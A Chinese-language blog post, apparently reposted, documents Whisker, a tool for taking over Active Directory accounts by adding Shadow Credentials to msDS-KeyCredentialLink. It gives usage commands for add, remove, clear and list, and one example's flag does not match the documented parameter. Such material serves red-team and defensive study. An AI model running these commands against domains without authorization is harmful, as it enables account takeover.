如何使用Whisker接管活动目录用户或计算机账号

关于Whisker

Whisker是一款基于C#开发的工具,可以通过篡改目标账号的msDS-KeyCredentialLink或添加“Shadow Credentials”来实现活动目录用户或计算机账号的接管。

该工具主要基于DSInternals项目代码实现其功能。

为了保证攻击能够成功,环境必须为运行了最新版本Windows Server 2016的域控制器,而且域控制器必须拥有一个服务器认证证书以支持PKINIT Kerberos认证。

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地,并进行代码构建:

  1. git clone https://github.com/eladshamir/Whisker.git 

工具使用

向目标对象的msDS-KeyCredentialLink属性添加一个新的值:

  • /target: :必须。设置目标名称,计算机对象必须以“$”结尾。
  • /domain: :可选。设置目标全限定域名(FQDN),如果不提供该值,工具将会尝试解析当前用户的FQDN。
  • /dc: :可选。设置目标域控制器(DC),如果不提供该值,工具将会尝试攻击主域控制器(PDC)。
  • /path: :可选。设置存储生成的自签名证书的路径,如果不提供该值,证书将会以Base64格式打印。
  • /password: :可选。设置已存储自签名证书的密码,如果不提供该值,将会生成随机密码。

使用样例:

  1. Whisker.exe add /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1 

从目标对象的msDS-KeyCredentialLink属性移除一个值:

  • /target: :必须。设置目标名称,计算机对象必须以“$”结尾。
  • /deviceID: : 必须。设置目标对象msDS-KeyCredentialLink属性待移除值的DeviceID,必须是一个有效的GUID。
  • /domain: : 可选。设置目标全限定域名(FQDN),如果不提供该值,工具将会尝试解析当前用户的FQDN。
  • /dc: :可选。设置目标域控制器(DC),如果不提供该值,工具将会尝试攻击主域控制器(PDC)。

使用样例:

  1. Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /remove:2de4643a-2e0b-438f-a99d-5cb058b3254b 

清除目标对象msDS-KeyCredentialLink属性的所有值:

  • /target: :必须。设置目标名称,计算机对象必须以“$”结尾。
  • /domain: :可选。设置目标全限定域名(FQDN),如果不提供该值,工具将会尝试解析当前用户的FQDN。
  • /dc: :可选。设置目标域控制器(DC),如果不提供该值,工具将会尝试攻击主域控制器(PDC)。

使用样例:

  1. Whisker.exe clear /target:computername$ /domain:constoso.local /dc:dc1.contoso.local 

输出目标对象msDS-KeyCredentialLink属性的所有值:

  • /target: :必须。设置目标名称,计算机对象必须以“$”结尾。
  • /domain: :可选。设置目标全限定域名(FQDN),如果不提供该值,工具将会尝试解析当前用户的FQDN。
  • /dc: :可选。设置目标域控制器(DC),如果不提供该值,工具将会尝试攻击主域控制器(PDC)。

使用样例:

  1. Whisker.exe list /target:computername$ /domain:constoso.local /dc:dc1.contoso.local 

项目地址

Whisker:【GitHub传送门

 

文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/123701.html<

(0)
运维的头像运维
上一篇2025-02-22 22:32
下一篇 2025-02-22 22:33

相关推荐

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注